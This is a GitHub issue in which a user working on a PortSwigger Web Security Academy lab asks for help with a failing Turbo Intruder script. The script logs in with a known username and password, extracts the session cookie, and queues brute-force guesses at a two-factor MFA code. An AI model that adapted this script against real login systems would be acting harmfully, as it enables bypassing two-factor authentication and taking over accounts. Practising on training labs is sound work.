You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello dear team of Portswigger, i got an idea while i was doing one of your labs, basically i try to use the Set-Cookie: session to set it as a cookie header on my following request and so on, the issue is i suck in python, and in turbo intruder the same, so as the script is failing i want to know two things.
1- How can i handle with this Reqs: 1| Queued: 0 | Duration: 2| RPS:1| Connections: 1 | Retries: 0 | Fails: 0 | Next: null Completed | to determine what is causing the issue, what is the common cause?
2- Well, chatgpt is doing well but i'm not sure how to capture the responses, and i don't find much on the docs about how to capture response's parameters, if do you want to see i share my script as example
def queueRequests(target, _):
global engine
engine = RequestEngine(
endpoint="https://0a0e00210386a90b81b849f700aa0039.web-security-academy.net:443",
concurrentConnections=1,
requestsPerConnection=1,
engine=Engine.BURP
)
initial_login_request = """POST /login HTTP/2
Host: 0a0e00210386a90b81b849f700aa0039.web-security-academy.net
Content-Length: 29
username=carlos&password=montoya"""
print("Queuing initial request to capture session cookie...")
engine.queue(initial_login_request, label="get_session")
def handleResponse(req, interesting):
if req.label == "get_session":
cookie_header = req.getHeader("Set-Cookie")
print(f"Cookie header found: {cookie_header}")
if cookie_header:
session_value = None
for header in cookie_header.split(';'):
if header.strip().startswith("session="):
session_value = header.strip().split("=")[1]
break
print(f"Extracted session value: {session_value}")
if session_value:
brute_force_security_code(session_value)
else:
print("Session value could not be extracted.")
else:
print("No Set-Cookie header found in response.")
def brute_force_security_code(session_value):
security_codes = ["0000", "0001", "0002", "0003", "9999"] # Replace with desired range
print("Starting brute-force with extracted session cookie...")
for code in security_codes:
attack_request = """POST /login2 HTTP/2
Host: 0a0e00210386a90b81b849f700aa0039.web-security-academy.net
Content-Length: 20
Cookie: session=%s
mfa-code=%s""" % (session_value, code)
print(f"Queuing brute-force attempt with mfa-code {code} and session {session_value}")
engine.queue(attack_request)
The text was updated successfully, but these errors were encountered:
Hello dear team of Portswigger, i got an idea while i was doing one of your labs, basically i try to use the
Set-Cookie: sessionto set it as a cookie header on my following request and so on, the issue is i suck in python, and in turbo intruder the same, so as the script is failing i want to know two things.1- How can i handle with this
Reqs: 1| Queued: 0 | Duration: 2| RPS:1| Connections: 1 | Retries: 0 | Fails: 0 | Next: null Completed |to determine what is causing the issue, what is the common cause?2- Well, chatgpt is doing well but i'm not sure how to capture the responses, and i don't find much on the docs about how to capture response's parameters, if do you want to see i share my script as example
The text was updated successfully, but these errors were encountered: